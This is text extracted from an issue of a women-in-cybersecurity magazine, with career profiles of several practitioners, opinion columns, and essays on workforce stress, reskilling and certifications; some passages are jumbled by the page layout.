Ramona’s personal journey within cybersecurity highlights the importance of continuous learning, resilience, and collaboration. “Cybersecurity is an ever-changing field, and success demands a willingness to explore, fail, and learn,” she says. She emphasizes the importance of experimentation and curiosity, noting that a diverse background can offer fresh perspectives in tackling cybersecurity challenges. “See your background as an advantage,” she encourages, whether transitioning from finance, healthcare, or any other field. Embracing new ideas and approaches is key to driving innovation in the industry.

Finally, in a demanding field like cybersecurity, maintaining a work-life balance is crucial. Ramona believes in integrating both personal and professional life, prioritizing mental and physical health as part of a holistic approach to success. “Work smart and prioritize what’s important at any given time,” she advises. “Individual fulfillment comes from both professional achievement and personal well-being.”

For Ramona, cybersecurity is more than a career— it’s a mission to protect the trust and security that underpin our digital world. With a deep commitment to resilience, empowerment, and collaboration, she continues to shape the future of the industry, inspiring others to do the same.

www.linkedin.com/in/ramonaratiu

You to HELP Us Lights On

Opportunities

options to suit your needs, including:

Full-Page Ads

with maximum visibility

Partner Magazine Ownership Opportunity

Align your brand with industry excellence and innovation by partnering with Source2Create. Receive exclusive ownership recognition for Women in Security Magazine, delivered on your behalf as the sole partner of this prestigious publication.

REQUEST A QUOTE

Event Promotion

Spotlight your events, webinars, or conferences to a targeted audience

Esther Roberts

Cybersecurity Analyst and Penetration Tester at Port Harcourt

Esther Roberts’ journey into cybersecurity began with a fateful phone call in 2022, just after completing her youth service.

“Someone called offering me a job, asking me to call another number, and eventually requested a payment to secure my spot,” she recounts. Skeptical yet curious, she turned to Google, uncovering the mechanics of social engineering—a revelation that ignited a spark. “I didn’t even know the term ‘phishing’ back then,” she admits, “but that incident opened my eyes.”

Her discovery led her to take Cisco’s Introduction to Cybersecurity course, marking her first step into the field. A serendipitous encounter on Twitter introduced her to the CyberGirls program by the CyberSafe Foundation, where she successfully majored in Vulnerability Assessment and Penetration Testing. This program transformed her budding interest into a fully-fledged passion.

“I always knew I wanted something in ethical hacking,” Esther reflects. The structured tracks in the CyberGirls program reinforced her goal of protecting digital spaces from threat actors. Over time, her interests expanded to include digital forensics, illustrating

her appreciation of the interconnected nature of cybersecurity roles.

While she embraced her path with determination, Esther wasn’t immune to moments of self-doubt. “I never doubted my choice of career, but I questioned my abilities,” she shares candidly. In those moments, she found strength in the CyberGirls mantra: “I am knowledgeable, resilient, and excellent… I am a CyberGirl.”

This mantra served as a lifeline, reminding her of her potential and fueling her drive to overcome challenges.

"It’s okay to be unsure at first. Explore, stay consistent, and let passion guide you. Take advantage of free resources and remember— learning never ends.”

Esther’s journey has been shaped by inspiring figures in the cybersecurity world. Confidence Staveley, a global mentor, instills in her the belief that greater heights are achievable. Her Cybergirls mentor, Chineye C. Chizea, continuously supports her with resources and encouragement. Esther also credits digital influencers like the Digital Empress, whose content on cybersecurity and business resonates with her aspirations. “Their stories remind me that I can do it—and that I should do it,” she says with conviction.

Reflecting on her path, Esther offers words of wisdom to her younger self:

“It’s okay to be unsure at first. Explore, stay consistent, and let passion guide you. Take advantage of free resources and remember—learning never ends.”

For those transitioning into cybersecurity, she advises leveraging skills from previous careers. “Draw parallels between your background and cybersecurity. You’ll see how interconnected things are, which helps in understanding concepts.”

Looking to the future, Esther predicts significant developments in AI and machine learning for anomaly detection. Yet, she also warns of AI-powered

cyberattacks, emphasizing the need for organizations to adopt AI-driven security solutions. “It’s going to be the good AI versus the evil AI,” she quips.

Today, as a Cybersecurity Analyst and Penetration Tester at Port Harcourt, Esther embodies the drive to protect, learn, and grow. Her journey underscores a simple truth: curiosity, persistence, and a supportive community can transform any spark of interest into a blazing passion.

“I am a voracious learner, so nothing is too difficult for me to master.”

Esther Roberts is living proof of this mantra, and she’s only just begun.

www.linkedin.com/in/estherrobertsthankgod

x.com/i_estherroberts?s=21

Lihansa Minradie Jayasinghe

Associate Engineer - Information Security at CryptoGen

Lihansa Minradie Jayasinghe’s journey into cybersecurity is anything but conventional. Initially drawn to biological sciences, she had little interest in IT. “My main passion was in life sciences,” she says, reflecting on her early academic pursuits. But as technology began to shape the world around her, curiosity sparked a shift in focus. “I wanted to understand how everything was connected and how people could assure their data was secure over the internet,” she explains. What began as a casual exploration turned into a deeper fascination, leading her to pivot her studies toward computer science and cybersecurity.

Her decision to specialise in defensive security wasn’t immediate; it grew through her immersion in the field. “The more I learned, the more I realized my true passion was in protecting systems and tracking down those trying to break them,” she says. However, transitioning from life sciences to a highly technical domain came with its share of challenges.

Lihansa openly acknowledges moments of doubt. “I was surrounded by peers who were much more tech-

savvy than I was. It was daunting, and I sometimes wondered if I had made the right choice.” But her drive to succeed, combined with a passion for the field, kept her going. “I dedicated extra time to learning and eventually found my rhythm. Looking back now, I’m certain I made the right decision.”

If she could give advice to her younger self, Lihansa would encourage an earlier embrace of the learning process. “Cybersecurity is constantly evolving, and staying curious is essential. I’d tell myself to start with the basics networks, programming, security concepts and not be afraid to step out of my comfort zone.” She also highlights the value of patience. “It’s a field where you won’t know everything at the start, and that’s okay. Growth comes with time and persistence.”

For aspiring cybersecurity professionals, Lihansa emphasises building a strong foundation in networking, programming, and risk management. These, she believes, are key to understanding both how systems are compromised and how to defend them.

“Every experience teaches you something valuable,” she says. “Cybersecurity is a journey, and it’s one that’s well worth the effort.”

Balancing the demands of her role is another aspect of her journey. In the fast-paced world of defensive security, maintaining focus and avoiding burnout is crucial. “There isn’t always a 9-to-5 schedule in this field,” she says. Creative writing, especially poetry, is her way of unwinding. “It clears my mind and helps me express myself. Spending time with loved ones and staying active are also important for keeping that balance.”

To stay current, Lihansa pursues certifications, keeps up with threat intelligence, and remains hands-on with the tools and systems used in her work. “Continuous learning is non-negotiable in this field,” she says, emphasising the importance of both technical expertise and community engagement.

For those transitioning into cybersecurity from other fields, Lihansa’s simple but powerful advice is: “Be patient and embrace the learning curve, Don’t be discouraged by what you don’t know but Build on your strengths, and take it step by step. Hands-on practice and networking are invaluable.”

Her story is a testament to the power of adaptability and determination. From life sciences to cybersecurity, Lihansa’s journey reflects the importance of following one’s curiosity, embracing challenges, and finding fulfillment in the pursuit of a passion. “Every experience teaches you something valuable,” she says. “Cybersecurity is a journey, and it’s one that’s well worth the effort.”

www.linkedin.com/in/lihansaj

Stacia Mason

GRC Analyst at Acrisure

For Stacia Mason, a Risk Analyst based in Grand Rapids, Michigan, the seeds of her cybersecurity career were planted early.

“It all started with my dad,” she recalls, “who had a passion for technology and used to build computers from the ground up as a hobby. Growing up, he’d always say, ‘Computers are the future.’” Those words stuck with her, and as she witnessed the rise of social media and the vulnerabilities it exposed, Stacia found herself drawn to the challenge of safeguarding digital spaces.

“What began as a personal interest grew into a fascination with the strategic side of cybersecurity,” she says. “Identifying risks before they become issues and protecting organizations in an ever-evolving digital world—it’s a puzzle I never get tired of solving.”

Yet, Stacia’s path to cybersecurity was anything but traditional. Without a tech background, she took a leap of faith and enrolled in an intensive eightmonth cybersecurity program through the West Michigan Center for Arts and Technology (WMCAT) in partnership with GRCIE. “Stepping into cybersecurity was intimidating. I wasn’t sure how I’d fit in,” she admits. “But I kept reminding myself, ‘If I don’t take this chance, I’ll never know what’s possible.’”

The program proved transformative. It offered handson experience, bolstered her confidence, and showed her how transferable skills like problem-solving and communication could flourish in the cybersecurity world. From there, Stacia seized every opportunity to grow, whether through networking, certifications, or mentorships. “Piece by piece, things started to click,” she reflects. “Looking back, it was all about trusting myself and stepping out of my comfort zone.”

Now, as a Risk Analyst, Stacia navigates the complexities of a field that’s anything but static. “Cybersecurity is constantly evolving, and some days, it feels like there are a million moving pieces. It can get overwhelming,” she shares. Her approach? Breaking challenges into manageable steps, relying on her team for collaborative problem-solving, and celebrating the victories that come with securing systems and data.

"Trust your intuition and don’t shy away from challenges. Surround yourself with a community that aligns with your vision and never stop learning.”

Despite her accomplishments, Stacia acknowledges moments of doubt, particularly early on. “Coming from a non-technical background, I often questioned whether I belonged in this field,” she recalls. Mentors and peers played a pivotal role in silencing those doubts, reminding her of the value she brought to the table. Over time, she embraced the idea that “growth happens outside your comfort zone.”

Stacia’s career continues to unfold organically, with GRC being her current focus. “Right now, it’s the perfect fit,” she says. “But as I learn more, I can see myself stepping into a technical role like security engineering.” For her, the journey is less about rigid plans and more about staying curious and open to new challenges.

Her advice to those considering cybersecurity? “Trust your intuition and don’t shy away from challenges. Surround yourself with a community that aligns with your vision and never stop learning.” She also emphasizes the importance of networking, mentorship, and finding joy in the learning process.

As she looks ahead, Stacia is optimistic about the transformative role AI and machine learning will play in cybersecurity, as well as the growing challenges they pose. “AI-powered phishing and social engineering tactics are evolving quickly. Raising awareness and improving detection tools will be crucial,” she notes.

For Stacia, success is measured not just in technical achievements but in the balance she maintains in her life. “I’ve learned that taking care of myself isn’t just good for me—it makes me better at my job. When I feel grounded, I can bring my best self to work and home.”

Her journey, marked by bold choices, continuous learning, and a passion for collaboration, is a testament to the potential of embracing uncertainty. “Cybersecurity,” she reflects, “isn’t just a field—it’s a way of thinking, solving problems, and making an impact. And I wouldn’t trade this journey for anything.”

“If I don’t take this chance, I’ll never know what’s possible.” “Growth happens outside your comfort zone.”

“Cybersecurity is a puzzle I never get tired of solving.”

www.linkedin.com/in/staciajmason

CRAIG FORD

Head Unicorn – Cofounder and Executive Director, Cyber Unicorns. Australian Best Selling Author of A Hacker I Am, Foresight and The Shadow World book series. vCISO – Hungry Jacks, Wesley Mission, PCYC, Baidam Solutions and Ipswich City Council. Member of the Board of Directors – AISA (Australian Information Security Association).

COLUMN

Climbing out of the ashes of failure

Resurgence: The Phoenix’s Triumphant Ascent is the theme for the 23rd edition of this amazing magazine. When I say these words the image they conjure up is one of the mythical origins of a majestic phoenix launching into the sky from a mountain of ashes with flames trailing from its feathers. It is a magnificent sight: one of rebirth, of achievement and inspiration.

In my last article, in edition 22, I talked about some of my own failures and how I was able to take those situations and make something amazing from them. We all fail sometimes. It’s part of being human. It’s part of life. When I was growing up my father used to say to me: “It doesn’t matter that we fall sometimes, it’s about how we brush ourselves off, get back up and try again.”

These words reflect how I live my life.

Those who know me well will know I am not one to shy away from a challenge, quite the opposite, and to my own detriment sometimes. I see a problem. I break it down, and I want to fix it. My passion drives me to achieve things beyond my self-belief. I don’t always know if I can achieve what I set out to do. Sometimes I fail, but I pick myself up and look for another way forward.

Sometimes growth hurts, and sometimes I want to give up and take the easy way, the well-worn path in life that many would happily follow. That is not me. That is not what gets me out of bed every morning.

As a founder of a startup, I took a leap of faith in myself. I believed the battle I wanted to wage to improve cyber education across vulnerable groups in this country, and in the world, was worth fighting. I put myself and my family’s financial security at risk because I knew I could make a difference.

I had been talking about it for years. I can almost hear myself saying it in many interviews and podcasts over the years. “Someone really needs to create a slipslop-slap campaign for the general public. Someone needs to step out and provide everyday people with access to cyber awareness education: mums and dads, seniors, SMBs and everyone in between.”

I can remember saying this as far back as 2018, the year I wrote my first article for CSO Online, the year I found my love for writing (The amazing Aby from WISM was the editor of CSO at that time, and I love that we are still on this writing journey together). It was a newfound hobby I never knew I wanted, or even considered, but writing is a skill that has brought me through the ashes on a few occasions, and given me the focus and drive to keep fighting for what I believe in.

“It doesn’t matter that we fall sometimes, it’s about how we brush ourselves off, get back up and try again.”

What am I trying to say here? It’s simple, and something I want to instil in you if I can. I want you to believe in yourself, believe in what you know you are born to do in this world and take the chances you know are worth the risk. Sometimes you might fail, but failure is good.

Thomas Alva Edison—who invented the light bulb— said: “I didn’t fail 1,000 times. The light bulb was an invention with 1,000 steps.” Take this idea and reframe how you see your goals and your career. Look at failures or hiccups in your journey as steps towards achieving the goals you have set for yourself. Allow yourself to imagine the possibilities. Launch yourself like the phoenix from the ashes and become a magnificent shining light for others to see, and say: “Maybe I can reach a little higher. Maybe that could be me.”

Be that phoenix. Be the beacon of hope that shows we can aspire to do great things, that we are capable and worthy of success.

www.linkedin.com/in/craig-ford-cybersecurity

www.facebook.com/profile.php?id=61552330571786

www.instagram.com/cyberunicorns.com.au

x.com/CraigFord_Cyber

www.cyberunicorns.com.au

INDUSTRY PERSPECTIVES

MARCUS LAVALLE-SMITH

CYBERSECURITY AND HARRY POTTER - PART 2: RISING ABOVE THE THREATS

By Marcus Lavalle-Smith , Principal Consultant at Decipher Bureau (Cyber Security Recruitment). Harry Potter fan.

As we look to the future of cybersecurity there are significant warnings to be heeded from the magical world of Harry Potter and the resilience displayed by Fawkes the phoenix. In the face of growing threats, cybersecurity professionals, like our beloved heroes from Hogwarts, must rise stronger from each challenge. Let us explore how the mythical creatures, spells and lessons from the wizarding world can help us forge a path through the turbulent landscape of modern cyber threats.

THE TRIWIZARD TOURNAMENT: PREPARING FOR CYBER BATTLE

In Harry Potter and the Goblet of Fire, the Triwizard Tournament serves as a test of strength, bravery and wit. Similarly, cybersecurity professionals face ongoing challenges that test their skills against everevolving threats. The tournament is dangerous, with

each task pushing the contestants to their limits, much like how cybersecurity teams must always be on alert for sophisticated attacks.

Take the second task, where competitors need to face the dangers lurking beneath Hogwarts’ Lake, or the third where they have to navigate through a dangerous maze. These mirror the ways cybersecurity teams must deal with multifaceted threats like ransomware attacks, distributed denial of service (DDoS) attacks and complex vulnerabilities hidden within networks. Just as Harry and his friends were forced to adapt, cyber professionals must constantly update their knowledge and employ the latest strategies to stay ahead of the attackers. The use of proper tools like firewalls, intrusion detection systems and threat intelligence, help safeguard against threats, just as magical protections helped Harry in the tournament.

THE MARAUDER’S MAP: REAL-TIME THREAT VISIBILITY

those who see it, cyber threats like data breaches, advanced persistent threats (APTs) and zero-day vulnerabilities can cause long-term damage to an organisation’s reputation, finances and operations.

The Marauder’s Map in the Harry Potter books is a magical map that shows the complete layout of Hogwarts, including secret locations and hidden paths. This is exactly what modern-day cybersecurity experts need: a clear, realtime map of their systems, users and network traffic. Just as the Marauder’s Map shows every route and location within the castle, cybersecurity tools like security information and event management (SIEM) systems offer a comprehensive view of what is happening on a network at any given time. With proper visibility, security teams can detect anomalies and quickly respond to potential breaches.

THE DARK MARK: THE SILENT THREAT

Voldemort’s Dark Mark, a symbol of fear and power, is akin to the silent, invisible nature of modern cyber threats. These threats can appear with little warning, often leaving organisations unaware until it is too late. Just as the Dark Mark strikes fear into the hearts of

DUMBLEDORE’S ARMY: THE POWER OF COLLABORATION

In the Harry Potter series one of the most powerful tools in the fight against evil is collaboration. Dumbledore’s Army (DA) was a group of students who banded together to learn Defence Against the Dark Arts and face the challenges posed by the forces of evil. In cybersecurity, collaboration is just as crucial. Cybersecurity experts must work together across teams, sharing knowledge, tools and strategies to defend against the growing number of cyber threats.

Just as the members of DA combined their knowledge and skills to confront dark forces, companies must rely on teamwork and information sharing to combat cyber threats. Threat intelligence sharing platforms, collaborative forums and joint cyber defence initiatives are essential to

JO STEWART-RATTRAY

BREAKING THE BARRIERS: WOMEN IN CYBERSECURITY AND THE PATH TO A RESILIENT DIGITAL FUTURE

by Jo Stewart-Rattray , Oceania Ambassador, ISACA

As we close 2024 and reflect on the year that was, it’s safe to say the cybersecurity industry is at a crossroads. We continue to grapple with increasing threats that are intricate and complex, we are experiencing rising stress levels and the skills gap remains persistent.

According to the 2024 State of Cybersecurity report by ISACA, 64 percent of cybersecurity professionals in Australia report higher stress in their roles compared to five years ago, highlighting an urgent need for change. For women in security, this is both a challenge and an opportunity. The statistics and sentiments in the ISACA report not only reflect the pressure faced by cybersecurity professionals, they

also highlight how women can play a critical role in strengthening the industry.

THE

GROWING CHALLENGE: STRESS AND SKILLS GAPS

ISACA’s report indicates that Australian cybersecurity professionals are experiencing stress at higher rates than their global peers, driven by:

• An increasingly complex threat landscape (85 percent locally versus 81 percent globally)

• Budget constraints (48 percent versus 45 percent globally)

• Worsening hiring and retention challenges (50 percent versus 45 percent globally)

• Limited prioritisation of cybersecurity risks (35 percent versus 34 percent globally)

These barriers are compounded by workforce shortages. With 51 percent of organisations reporting understaffed cybersecurity teams and only 34 percent expecting budgets to increase in the next year, the industry is struggling to keep pace with threats. Women, who remain underrepresented in cybersecurity, face unique challenges in this maledominated field, but their involvement is essential to address the growing demands of the profession.

THE OPPORTUNITY: WOMEN AS CHANGE AGENTS IN CYBERSECURITY

Women bring diverse perspectives, leadership styles and critical interpersonal skills—such as communication, critical thinking and problemsolving—that the ISACA report identifies as key gaps in the industry. Organisations must recognise the untapped potential of women to enhance collaboration and innovation in cybersecurity teams.

Staying ahead of new technologies is all-consuming and a diversity of perspectives is crucial in this battle.

Many of the barriers women face—such as limited mentorship opportunities, lack of career visibility and work-life balance concerns—are not insurmountable. Programs that offer mentorship, leadership training and flexible work environments can assist women to thrive in cybersecurity roles.

ADDRESSING BARRIERS: BRIDGING THE SKILLS GAP

Interpersonal skills—identified as a critical gap by 47 percent of survey respondents—are skills in which women often excel. Communication and leadership skills are vital for driving team cohesion and effective response strategies. Empowering women through technical training and certifications, combined with leveraging their natural aptitude for collaboration, can position women as indispensable assets in the fight against cyber threats.

COMBATING BURNOUT: PRIORITISING WELLBEING

The ISACA report highlights the toll that stress takes on cybersecurity professionals, with high work stress cited as a key reason for attrition (60 percent in Australia compared to 46 percent globally). For women, this stress is often compounded by the challenges of balancing professional and personal responsibilities in a high-pressure industry. Addressing burnout must become a priority for organisations seeking to retain top talent.

Employers need to explore initiatives such as flexible work schedules, building inclusive workplace cultures, mental health support and clear pathways for career progression.

BUILDING A CULTURE OF INCLUSION

For women to succeed in cybersecurity they must feel welcomed and supported in an industry sector that has traditionally been dominated by men. This means breaking down barriers like unconscious bias, ensuring fair recruitment practices and creating mentorship opportunities. Women-specific cybersecurity organisations and initiatives, such as ISACA’s SheLeadsTech program, play a crucial role in building supportive networks and inspiring the next generation of female cybersecurity professionals.

The ISACA report also highlights the importance of addressing recruitment and retention challenges across the board. With 63 percent of Australian organisations struggling to retain talent, the industry must prioritise an inclusive culture that encourages women to stay and grow within their roles.

A CALL TO ACTION FOR WOMEN AND ORGANISATIONS

The challenges outlined in ISACA’s report confirm the urgent need for fresh talent, perspectives and strategies. For women considering a career in cybersecurity the path may not always be easy, but there is no denying that women can be impactful. By stepping into this field women can become agents of change, helping to close the skills gap, strengthening defences and building a more secure digital future.

For organisations, my message is to foster diversity not just as a matter of equity, but as a strategic imperative. Empowering women through mentorship, education and supportive work environments is not only the right thing to do, but is essential for combating threat actors and creating resilient businesses.

WOMEN LEADING THE WAY FORWARD

In 2025 I will continue championing efforts to help cybersecurity professionals redefine what a healthy cybersecurity workforce looks like, and what it means to truly participate and lead in this field. With the right support systems in place and a strong commitment to inclusion, women will bring invaluable skills, perspectives and resilience that this sector needs more than ever.

I’m proud of the strides we’ve made in advancing diversity and inclusion, although I would like to see a greater rate of change, and I urge organisations to continue these efforts as a key driver of innovation and strength.

Women in cybersecurity are not merely filling a gap, we are integral to reshaping the future.

ABOUT THE AUTHOR

Jo Stewart-Rattray has over 25 years’ experience in the security industry. She consults on risk and technology issues with a particular emphasis on governance and IT security in businesses as a director with BRM Advisory. She regularly provides strategic advice and consulting to the banking and finance, utilities, healthcare, manufacturing, tertiary education, retail and government sectors.

www.linkedin.com/in/jo-stewart-rattray-4991a12

THE PHOENIX EFFECT: WOMEN RESKILLING AND PIVOTING INTO CYBERSECURITY

by Lisa Ventura MBE , Founder – Cyber Security Unity

In the world of Greek mythology the Phoenix is a magnificent bird that rises reborn from the ashes of its funeral pyre. It symbolises rebirth, renewal and transformation. It stands as a metaphor for reinventing oneself after adversity; something that resonates deeply with many women who find themselves at the crossroads of career transitions, particularly those venturing into the rapidly expanding field of cybersecurity.

The ‘Phoenix Effect’ describes the journey of women leaving behind careers in industries such as education, marketing or healthcare and embracing new roles in cybersecurity, where they must reskill, learn and thrive in a dynamic and challenging environment. The rise of women in cybersecurity signifies more than just a career pivot; it also signifies empowerment, resilience and the importance of diversity in a crucial industry.

THE GROWING NEED FOR CYBERSECURITY PROFESSIONALS

Cybersecurity has emerged as one of the most critical fields of the 21st century, with cyber threats increasing in both frequency and sophistication. As the digital landscape expands so too does the need for professionals who can protect sensitive data, defend against cyberattacks and ensure the security of complex networks. According to the 2024 (ISC)² Cyber security Workforce Study, the global cybersecurity workforce needs to grow by nearly 3.4 million professionals to meet the demands of organisations worldwide. This need creates a tremendous opportunity, particularly for those looking to pivot onto a new career path.

Women, historically underrepresented in cybersecurity and STEM fields, are beginning to recognise the potential for growth and fulfilment offered by a

LISA VENTURA

career in cybersecurity. The Phoenix Effect is playing out in real time as many women transition from their previous professions into this evolving sector. But what drives this shift, and how can women successfully navigate this career transition?

THE PHOENIX EFFECT: REINVENTING CAREERS IN CYBERSECURITY

Just as the phoenix symbolises transformation, so too does the journey of women who re-skill and pivot into cybersecurity. Leaving behind a previous career, especially one into which significant time and effort have been invested, can be daunting. However, many women are finding that a cybersecurity career not only offers professional and financial growth but also provides a sense of purpose: they are working towards something that truly matters in today’s digital age.

The Phoenix Effect means women transitioning into cybersecurity must often overcome initial fears and doubts about their technical skills and knowledge. While cybersecurity can seem like an intimidating field dominated by highly technical jargon and complex systems, many women are discovering that the skills they developed in their previous careers are not only transferable but valuable in this new context. Roles in cybersecurity require not only technical proficiency

but also problem-solving abilities, communication skills and leadership—attributes women from various industries already possess.

For example, a former educator entering cybersecurity brings strong analytical skills, the ability to communicate complex ideas clearly and experience in mentoring and guiding others. A marketing professional can leverage their understanding of human behaviour and risk management, while healthcare workers transitioning into cybersecurity are already adept at following strict regulations and handling sensitive information. The key is to identify and build upon these transferable skills, and then re-skill to gain the technical knowledge needed to succeed.

THE IMPORTANCE OF LIFELONG LEARNING IN CYBERSECURITY

One of the hallmarks of a successful career in cybersecurity is the commitment to lifelong learning. Technology is ever evolving, and so too are the tactics used by cybercriminals. Women transitioning into cybersecurity must embrace a mindset of continuous education and professional development. This might seem daunting at first, but for many it represents an exciting opportunity to stay at the cutting edge of innovation and technology.

The cybersecurity industry offers a wealth of educational pathways and certification programs designed to help individuals upskill and pivot into the field. Women interested in transitioning to cybersecurity can explore various online courses, boot camps and certification programs that provide both foundational knowledge and specialised expertise. Many of these programs are flexible, allowing women to study part-time while balancing existing responsibilities or continuing to work in their current profession.

Some of the most recognised certifications in cybersecurity include:

• CompTIA Security+: a great entry-level certification that covers the fundamentals of network security, threats and vulnerabilities.

• Certified Information Systems Security Professional (CISSP) : one of the most respected certifications for experienced cybersecurity professionals, emphasising security architecture, management and control.

• Certified Ethical Hacker (CEH) : focuses on penetration testing and ethical hacking, helping professionals learn how to identify and exploit vulnerabilities in systems.

Additionally, platforms like Coursera, edX, and LinkedIn Learning offer introductory courses in cybersecurity which are often free to access, making it easier than ever for women to gain technical knowledge at their own pace.

PROGRAMS SUPPORTING WOMEN’S CAREER CHANGES

Several organisations, recognising the gender gap in cybersecurity, have created initiatives specifically aimed at supporting women’s career pivots into the industry. These programs offer mentorship, networking opportunities, scholarships and career resources to help women successfully navigate their transition.

• Women in Cyber Security (WiCyS). This nonprofit organisation is dedicated to increasing the number of women in cybersecurity by offering career development opportunities including an annual conference, mentoring programs and job boards.

• CyberSafe Foundation. Through its Women in Cyber Security initiative, this organisation provides training, mentorship and scholarships to help women upskill and find careers in cybersecurity.

• Girls Who Code. While this program focuses

primarily on younger girls it also offers resources and support for women looking to re-skill and transition into tech fields like cybersecurity.

Additionally, many companies have begun offering retraining programs for women returning to the workforce after a career break, such as Accenture’s Returning Mums program and IBM’s Tech Re-Entry program, which provide cybersecurity training and job placement support.

TRANSFERABLE SKILLS AND THE POWER OF DIVERSITY

One of the major strength’s women bring to cybersecurity is their array of transferable skills gained in previous careers. These skills, often categorised as ‘soft’ skills, are essential in cybersecurity. Problem-solving, critical thinking, effective communication and project management are all critical to success in cybersecurity roles, and many women possess these attributes from their previous professions.

For example, cybersecurity is not just about writing code or configuring firewalls. It also involves understanding how to manage risks, assess vulnerabilities and anticipate the behaviour of malicious actors. Women from backgrounds such as law, finance and even the arts often excel in cybersecurity because they bring new perspectives to complex problems. This diversity of thought is essential in an industry where creative solutions are often the key to defending against novel threats.

Also, diversity in cybersecurity is not just a feelgood goal; it has a direct impact on problem-solving and innovation. A team made up of individuals with diverse backgrounds, experiences and ways of thinking is better equipped to identify weaknesses in systems and design more comprehensive security measures. Studies have shown that diverse teams are more creative and perform better when solving complex problems. Women’s contributions are essential to this effort, bringing fresh perspectives that challenge conventional approaches.

PRACTICAL ADVICE FOR WOMEN CONSIDERING A PIVOT TO CYBERSECURITY

A career pivot to cybersecurity can be both an exciting and overwhelming prospect for any woman contemplating such a move. Here are some practical steps to help ease the transition.

1. Assess your transferable skills. Begin by identifying the skills you already have that are relevant to cybersecurity. Problem-solving, risk management, communication and analytical thinking are just a few examples. Use these as a foundation for your transition.

2. Research educational pathways. Explore certification programs and online courses that fit your current skill level and career goals. Entrylevel certifications such as CompTIA Security+ are a good starting point for those new to cybersecurity.

3. Seek out mentorship and support networks. Join organisations like Women in Cyber Security (WiCyS) or attend cybersecurity conferences and meetups. Building a network of support can provide valuable advice, job leads and encouragement.

4. Gain hands-on experience. Look for opportunities to apply your knowledge through internships, volunteer work or participation in cybersecurity competitions like Capture the Flag (CTF) events. Practical experience is essential for building confidence and demonstrating your skills to potential employers.

5. Embrace lifelong learning. Cybersecurity is a field that requires continuous education and adaptation. Stay updated on the latest threats, tools and technologies by following industry news, taking additional courses and earning advanced certifications as your career progresses.

6. Believe in your ability to pivot. Transitioning to cybersecurity might seem like a big leap, but it is entirely possible with determination and the right mindset. The journey may be challenging, but like the phoenix, you have the potential to rise and succeed in a new and fulfilling career.

SIMON CARABETTA

A former public high school teacher, Simon has maintained his passion for education and brought it into his new career as he advocates for better cyber security awareness and cultural change. There is nothing special about the way he goes about doing what he does, he just draws on his raw passion for inspiring change and wanting people to realise why and how they should protect themselves and their families online.

COLUMN

Whiskey for my men and women, beer for my horses

Disclaimer: The writer, in no way, shape, or form, condones serving beer to any animal, especially horses.

WE’LL RAISE UP OUR GLASSES AGAINST EVIL FORCES...

I’m sure that most of this publication’s readers would know who Willie Nelson is. He’s the 91 year old outlaw country music legend who has been around for many decades, bringing us classics such as, On the Road Again, Mammas Don’t Let Your Baby’s Grow Up to Be Cowboys, and Whiskey River. But how many of you have heard of the late, great Toby Keith?

Probably not many, but you’ve won my respect if you have.

Why do I ask? Well, in 2003 both these country music singers teamed up to bring us the hit single, Beer for My Horses (hey, that’s the name of this article!) The song, with a very catchy tune, is about the need and desire for justice against those who’ve done us wrong. The lyrics tell of vengeance and defending others, rounding up those who’d be willing to commit crimes and, of course, bringing justice for all. It’s the kind of song that stirs up feelings about our security industry. We spend a lot of time developing and learning new ways to defend against the bad folks, but there is little discussion about how to take them down.

Back in the days when I worked for the national AustCyber Node Network our office was one level below the cybercrime unit of the WA Police Force. I had the chance to visit their office on several occasions, meet some of the people, and learn how

they would take down criminals in the digital world. It was exciting stuff, but when I look back on all I accomplished during my time at AustCyber, there was very little I achieved in relation to countering cybercrime. My work was all about cybersecurity and supporting the many amazing private sector startups coming out of Perth at the time.

We’ll raise up our glasses against evil forces is part of the chorus of Beer for My Horses, In full it is We’ll raise up our glasses against evil forces singing/Whiskey for my men, beer for my horses. Wouldn’t it be ideal to live in a world where we could celebrate our state and federal law enforcement agencies taking down some serious ransomware gangs, or helping to facilitate the overseas arrest of someone who had launched a distributed denial of service (DDoS) attack against a vital government website? I know this does happen from time to time, but I also believe there should be far more focus on the crime and punishment aspect when we discuss cyber.

‘Cause justice is the one thing you should always find is another line from Beer for My Horses.. Very apt lyrics when we think about the $2.7b lost by Australians to scams in 2024, or the 54 separate DDoS incidents we know of which the ASD responded to last financial year. Where is the justice?

Yes, we can set up and follow frameworks that will help protect us. We can train and raise awareness. We can facilitate executive tabletop exercises and test our incident response plans, all while procuring the latest ‘silver bullet’ in cyber defence. But until we see more takedowns and cooperation between

international agencies, we will likely be on the back foot for years to come. With advances in AI and quantum computing just around the corner, the bad folks are avoiding the justice we so desperately need. Not want, but need.

I’ll leave each of you lovely readers with a final question on this subject. Is the best defence an excellent offence? Or is it the other way around? We surely have the tools and capability to begin designing solutions that can increase our ability to bring the justice we’ve been searching for. And we’ll raise up our glasses against evil forces, singing whiskey for my men (and women) and beer for my horses.

www.linkedin.com/in/simoncarabetta

Source2Create Spotlight

Content

Content allows you to establish, share, and strengthen your brand. It helps build relationships which is why we are shining the light on our content service.

Content strategies don’t just define the goals your content is intended to achieve, but also the procedure, processes and governance required to get there. We can show you how to manage your content effectively .

We can then use that content to attract, acquire and engage your customer and new prospects, deepening your relationships

What are you waiting for? REACH

CAREER PERSPECTIVES

KAMBO

TRANSFORMING SETBACKS INTO AN UNSTOPPABLE RISE TO THE TOP

by Mary Kambo , Cybersecurity Engineer and Consultant

Growing up I was hooked on computers. I couldn’t wait to play games on my mum’s laptop. Her career as a networking engineer and IT officer introduced me to tech at an early age. By age six I was enrolled in computer classes and loving every moment; typing games and fun activities. I was the star of the class.

As I got older my passion for tech grew. In high school I took advanced computer classes and became the head of the IT club. It was exciting doing what I loved and developing leadership skills.

In my final year of high school I had to decide what to study at university. I wanted to explore programming, so I enrolled in a short course in web and mobile app development. At the time it was the toughest challenge I had faced, but my determination kept me going.

A few months later I entered university to pursue a degree in business and information technology. From day one I was set on specialising in cybersecurity. I even created a roadmap to becoming a chief

information security officer (CISO), which I shared with friends. We laughed at how ambitious it seemed, but I knew it was the right path.

Then, in December 2020, I graduated during a tough time. The job market was a mess. People were being laid off and, no matter how many jobs I applied for, I received rejections. To make matters worse my mum got COVID-19 and this hit us hard emotionally and financially. Between taking care of her and figuring out my career I was stressed, but I pushed forward.

After months of uncertainty I landed my first job as a software engineer. It wasn’t in cybersecurity, but it was a start. I spent two years in the role, learning about systems and gaining real-world experience. Then, later in 2021, something incredible happened. I was nominated for the WomenTech Global Awards in two categories: Rising Star in STEM of the Year and WomenTech Ambassador. Those nominations boosted my confidence and showed me I was on the right track.

MARY

